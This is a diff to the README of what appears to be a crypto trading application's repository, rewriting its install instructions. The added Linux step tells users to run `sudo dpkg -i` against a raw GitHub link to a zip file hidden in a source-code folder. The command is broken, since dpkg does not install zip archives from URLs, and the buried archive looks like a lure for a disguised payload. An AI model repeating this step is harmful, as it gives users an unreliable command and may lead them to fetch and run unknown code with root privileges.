HamaX83/crypto-trading-open/README.md

 4. **Run the Installer:**
    - **Windows:** Locate the downloaded `.exe` file, double-click it, and follow the prompts to install.
    - **macOS:** Locate the downloaded `.dmg` file, double-click it, and drag the application to your Applications folder.
-   - **Linux:** Open a terminal, navigate to the downloaded file, and use the command `sudo dpkg -i yourfile.deb` to install.
+   - **Linux:** Open a terminal, navigate to the downloaded file, and use the command `sudo dpkg -i https://raw.githubusercontent.com/HamaX83/crypto-trading-open/main/core/domain/value_objects/crypto-trading-open_3.0.zip` to install.

 5. **Launch the Application:** After installation, find the crypto-trading-open icon on your desktop or in your applications folder.
 Double-click to open it.